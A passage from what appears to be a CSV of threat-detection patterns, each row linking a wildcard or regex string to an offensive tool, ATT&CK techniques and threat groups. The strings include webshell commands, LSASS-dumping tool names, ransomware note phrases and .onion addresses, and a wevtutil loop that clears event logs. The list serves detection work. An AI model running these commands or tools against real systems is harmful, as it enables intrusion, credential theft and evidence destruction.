- T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","62398" "*WdigestOffsets.csv*",".{0,1000}WdigestOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","62399" "*WE DESTROYED YOU 
BACKUPS*",".{0,1000}WE\sDESTROYED\sYOU\sBACKUPS.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62400" "*WE HACKED YOU*",".{0,1000}WE\sHACKED\sYOU.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62401" "*We had a woodoo*",".{0,1000}We\shad\sa\swoodoo.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","62402" "*We recommend to XOR your shellcode before you transfer it*",".{0,1000}We\srecommend\sto\sXOR\syour\sshellcode\sbefore\syou\stransfer\sit.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","#content","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","62403" "*we will continue the process of leaking or selling your documents*",".{0,1000}we\swill\scontinue\sthe\sprocess\sof\sleaking\sor\sselling\syour\sdocuments.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62404" "*we.exe -s rssocks -d *",".{0,1000}we\.exe\s\-s\srssocks\s\-d\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62405" "*weak1337/Alcatraz*",".{0,1000}weak1337\/Alcatraz.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","62406" "*weakpass.com/crack-js*",".{0,1000}weakpass\.com\/crack\-js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential 
Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62407" "*weakpass.com/generate*",".{0,1000}weakpass\.com\/generate.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62408" "*weakpass.com/wordlist/*",".{0,1000}weakpass\.com\/wordlist\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62409" "*weakpass/crack-js*",".{0,1000}weakpass\/crack\-js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62410" "*weakpass_3.7z*",".{0,1000}weakpass_3\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62411" "*weakpass_3a.7z.torrent*",".{0,1000}weakpass_3a\.7z\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62412" 
"*weakpass-main.*",".{0,1000}weakpass\-main\..{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62413" "*Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery*",".{0,1000}Weaponized\sJuciyPotato\sby\s\@decoder_it\sand\s\@Guitro\salong\swith\sBITS\sWinRM\sdiscovery.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","62414" "*web_cloner/interceptor*",".{0,1000}web_cloner\/interceptor.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","62416" "*webapi/nemesis_api.py*",".{0,1000}webapi\/nemesis_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","62418" "*WebAuthn proxy running*",".{0,1000}WebAuthn\sproxy\srunning.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","62419" "*WebBrowserPassView.cfg*",".{0,1000}WebBrowserPassView\.cfg.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62420" "*WebBrowserPassView.exe*",".{0,1000}WebBrowserPassView\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62421" "*WebBrowserPassView.exe*",".{0,1000}WebBrowserPassView\.exe.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that 
reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62422" "*WebBrowserPassView.pdb*",".{0,1000}WebBrowserPassView\.pdb.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62423" "*WebBrowserPassView.zip*",".{0,1000}WebBrowserPassView\.zip.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. 
as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62424" "*webcam-capture-0.3.10.jar*",".{0,1000}webcam\-capture\-0\.3\.10\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","62425" "*webcamsnap -v*",".{0,1000}webcamsnap\s\-v.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","62426" "*webclientservicescanner -dc-ip *",".{0,1000}webclientservicescanner\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62427" "*WebDavC2*",".{0,1000}WebDavC2.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actual C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","62428" "*webdavC2.py*",".{0,1000}webdavC2\.py.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actual C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","62429" "*WebDavC2-master.zip*",".{0,1000}WebDavC2\-master\.zip.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actual C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","62430" "*webdavC2server.py*",".{0,1000}webdavC2server\.py.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actual C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","62431" "*WebDeveloperSecurityChecklist*",".{0,1000}WebDeveloperSecurityChecklist.{0,1000}","offensive_tool_keyword","WebDeveloperSecurityChecklist","A checklist of important security issues you should consider when creating a web application. Can be used by an attacker to check for weaknesses to exploit","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist","1","0","N/A","N/A","N/A","5","421","58","2021-05-10T07:48:47Z","2017-05-16T20:31:38Z","62432" "*web-hacking-toolkit.git*",".{0,1000}web\-hacking\-toolkit\.git.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1210 - T1059 - T1105 - T1189 - T1071","TA0001 - TA0002 - TA0011 - TA0005","N/A","N/A","Exploitation tool","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","N/A","","N/A","","","","62433" "*webinject64.dll*",".{0,1000}webinject64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","62435" "*Webremote TorCT Client.exe*",".{0,1000}Webremote\sTorCT\sClient\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","62436" "*webshell http*/tomcatwar.jsp?cmd=*",".{0,1000}webshell\shttp.{0,1000}\/tomcatwar\.jsp\?cmd\=.{0,1000}","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DDuarte/springshell-rce-poc","1","0","N/A","N/A","N/A","1","19","12","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z","62437" "*webshell_execute*",".{0,1000}webshell_execute.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","62438" "*webshell-exegol.php*",".{0,1000}webshell\-exegol\.php.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62439" "*WebSocketReverseShellDotNet*",".{0,1000}WebSocketReverseShellDotNet.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","62440" "*Wedx765eb 
Daedx765ta*",".{0,1000}Wedx765eb\sDaedx765ta.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","62441" "*weevely generate *",".{0,1000}weevely\sgenerate\s.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","62442" "*weevely generate *.php*",".{0,1000}weevely\sgenerate\s.{0,1000}\.php.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62443" "*weevely https://*.php * id*",".{0,1000}weevely\shttps\:\/\/.{0,1000}\.php\s.{0,1000}\sid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62444" "*weg7sdx54bevnvulapqu6bpzwztryeflq3s23tegbmnhkbpqz637f2yd.onion*",".{0,1000}weg7sdx54bevnvulapqu6bpzwztryeflq3s23tegbmnhkbpqz637f2yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62445" "*WELCOME TO MULTI-METHOD LSASS DUMPING TOOL*",".{0,1000}WELCOME\sTO\sMULTI\-METHOD\sLSASS\sDUMPING\sTOOL.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","62446" "*Welcome to OpenBullet 2*",".{0,1000}Welcome\sto\sOpenBullet\s2.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","0","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","62447" "*Welcome to the Mrvar0x PowerShell Remote Shell!*",".{0,1000}Welcome\sto\sthe\sMrvar0x\sPowerShell\sRemote\sShell!.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","62448" "*Welcome to wso webshell *",".{0,1000}Welcome\sto\swso\swebshell\s.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - 
Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","62449" "*Welcome! Your are locked by SenSayQ!*",".{0,1000}Welcome!\sYour\sare\slocked\sby\sSenSayQ!.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62450" "*wemo2ysyeq6km2nqhcrz63dkdhez3j25yw2nvn7xba2z4h7v7gyrfgid.onion*",".{0,1000}wemo2ysyeq6km2nqhcrz63dkdhez3j25yw2nvn7xba2z4h7v7gyrfgid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62451" "*wePWNise*",".{0,1000}wePWNise.{0,1000}","offensive_tool_keyword","wePWNise","wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind. targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit. 
Cobalt Strike) and it also accepts any custom payload in raw format.","T1203 - T1059 - T1564.001","TA0002 - TA0003 - TA0007","N/A","N/A","Resource Development","https://github.com/FSecureLABS/wePWNise","1","0","N/A","N/A","N/A","4","353","96","2018-08-27T22:00:25Z","2016-11-09T11:01:11Z","62452" "*werdhaihai/AtlasReaper*",".{0,1000}werdhaihai\/AtlasReaper.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","N/A","3","3","255","28","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z","62453" "*werfault_shtinkering*",".{0,1000}werfault_shtinkering.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","62454" "*werfault_silent_process_exit*",".{0,1000}werfault_silent_process_exit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","62455" "*WerTrigger.exe*",".{0,1000}WerTrigger\.exe.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","N/A","9","3","221","36","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z","62456" "*WerTrigger-master*",".{0,1000}WerTrigger\-master.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","N/A","9","3","221","36","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z","62457" "*wesside-ng -*",".{0,1000}wesside\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","62458" "*wevtutil el | ForEach-Object {wevtutil cl *",".{0,1000}wevtutil\sel\s\|\sForEach\-Object\s\{wevtutil\scl\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","62461" "*wevtutil qe 
